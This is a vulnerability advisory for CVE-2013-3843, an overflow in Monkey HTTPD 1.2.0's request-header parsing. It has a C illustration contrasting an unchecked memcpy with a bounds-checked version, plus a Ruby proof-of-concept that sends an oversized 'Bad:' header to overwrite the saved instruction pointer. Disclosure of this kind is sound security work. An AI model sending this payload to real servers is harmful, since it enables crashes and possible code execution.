Title
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
Vulnerability With Possible Arbitrary Code Execution
Introduction
Monkey is a lightweight and powerful web server for
GNU/Linux.
It has been designed to be very scalable with low memory
and CPU consumption, which makes it well suited to embedded
devices. It targets ARM, x86 and x64.
Abstract
A specially crafted request sent to the Monkey HTTPD
server triggers a buffer overflow which can be used to
control the flow of execution.
Report Timeline
2013-05-29
Discovered vulnerability via fuzzing
2013-05-30
Vendor Notification
Status
Published
Affected Products
Monkey HTTPD <= 1.2.0
Exploitation Technique
Remote
Details
Improper bounds checking while parsing request headers
allows an attacker to craft a request whose header value
is larger than the destination buffer, triggering a buffer
overflow during the memcpy() call on line 268 of
mk_request.c.
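The following is an added illustration of the bug class described above. It is written for this page and is not Monkey's code: the buffer size (HDR_VALUE_MAX), the function names and the line-splitting helper are assumptions, and the only thing it takes from the advisory is the shape of the PoC header (a "Bad:" header with 2511 'A' bytes and 4 'B' bytes). The unsafe variant copies a request-controlled length with memcpy() into a buffer whose size it never sees; the hardened variant takes the destination size as part of its contract and refuses the oversized value before copying anything.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed header-value buffer in this illustration (assumed;
 * the advisory does not state Monkey's actual buffer size). */
#define HDR_VALUE_MAX 256

/* Locate the value part of "Name: value" within line[0..line_len).
 * Returns a pointer to the value and stores its length in *vlen,
 * or NULL if the line has no colon. */
static const char *header_value(const char *line, size_t line_len, size_t *vlen)
{
    const char *end = line + line_len;
    const char *colon = memchr(line, ':', line_len);
    if (colon == NULL)
        return NULL;
    const char *val = colon + 1;
    while (val < end && (*val == ' ' || *val == '\t'))
        val++;
    *vlen = (size_t)(end - val);
    return val;
}

/* Bug class the advisory describes (illustrative, not Monkey's code):
 * the value length comes straight from the request and is copied with
 * memcpy() into a caller-supplied buffer whose size is never consulted.
 * Returns the number of bytes copied, or -1 if the line has no colon. */
int copy_header_value_unsafe(char *dst, const char *line, size_t line_len)
{
    size_t vlen;
    const char *val = header_value(line, line_len, &vlen);
    if (val == NULL)
        return -1;
    memcpy(dst, val, vlen);      /* vlen is unchecked: overflows dst */
    dst[vlen] = '\0';
    return (int)vlen;
}

/* Hardened form: the destination size is part of the contract and an
 * oversized value is rejected before a single byte is copied.
 * Returns the number of bytes copied, or -1 on missing colon or overflow. */
int copy_header_value_safe(char *dst, size_t dst_len,
                           const char *line, size_t line_len)
{
    size_t vlen;
    const char *val = header_value(line, line_len, &vlen);
    if (val == NULL)
        return -1;
    if (vlen >= dst_len)         /* keep room for the terminator */
        return -1;
    memcpy(dst, val, vlen);
    dst[vlen] = '\0';
    return (int)vlen;
}

/* Build the header line the PoC sends: "Bad: " + 2511 'A' + 4 'B'.
 * Constructed in memory here; nothing is sent. Caller frees the result. */
char *build_poc_header(size_t *out_len)
{
    const char prefix[] = "Bad: ";
    size_t plen = sizeof(prefix) - 1;
    size_t len = plen + 2511 + 4;
    char *line = malloc(len + 1);
    if (line == NULL)
        return NULL;
    memcpy(line, prefix, plen);
    memset(line + plen, 'A', 2511);
    memset(line + plen + 2511, 'B', 4);
    line[len] = '\0';
    *out_len = len;
    return line;
}

int main(void)
{
    char small[HDR_VALUE_MAX];
    size_t len = 0;
    char *poc = build_poc_header(&len);
    if (poc == NULL)
        return 1;

    /* A benign header fits the fixed buffer under both versions. */
    const char host[] = "Host: localhost";
    printf("safe(Host)  -> %d\n",
           copy_header_value_safe(small, sizeof small, host, sizeof host - 1));

    /* The PoC value is 2515 bytes; the safe copy refuses it ... */
    printf("safe(PoC)   -> %d\n",
           copy_header_value_safe(small, sizeof small, poc, len));

    /* ... while the unsafe copy writes all 2515 bytes wherever dst points.
     * It is demonstrated against a heap buffer large enough to hold them
     * so this program does not smash its own stack. */
    char *big = malloc(len + 1);
    if (big != NULL) {
        printf("unsafe(PoC) -> %d bytes copied\n",
               copy_header_value_unsafe(big, poc, len));
        free(big);
    }
    free(poc);
    return 0;
}
```

Handing the unsafe copy a 256-byte stack buffer and the PoC line is exactly the condition the advisory describes: 2515 bytes land in a region sized for 256, and with the right padding the saved return address is overwritten by the trailing 'B' bytes.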
Proof of Concept
The vulnerability can be exploited by a remote attacker
without any special privileges. Under Ubuntu 13.04, a
2511-byte padding followed by four 'B' bytes overwrites the
saved instruction pointer with 0x42424242.
#!/usr/bin/env ruby
require "socket"

host = "localhost"
port = 2001   # Monkey's default listen port

s = TCPSocket.open(host, port)

# Request line, a Host header, then an oversized "Bad" header
# that overflows the fixed-size buffer in the header parser.
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
buf << "Bad: "
buf << "A" * 2511   # padding up to the saved return address (Ubuntu 13.04)
buf << "B" * 4      # overwrites it with 0x42424242
s.puts(buf)
s.close
Solution
There is currently no solution.
Risk should be considered high since it can be shown that
the flow of execution can be controlled by an attacker.
http://bugs.monkey-project.com/ticket/182
Doug Prostko <dougtko[at]gmail[dot]com>
Vulnerability discovery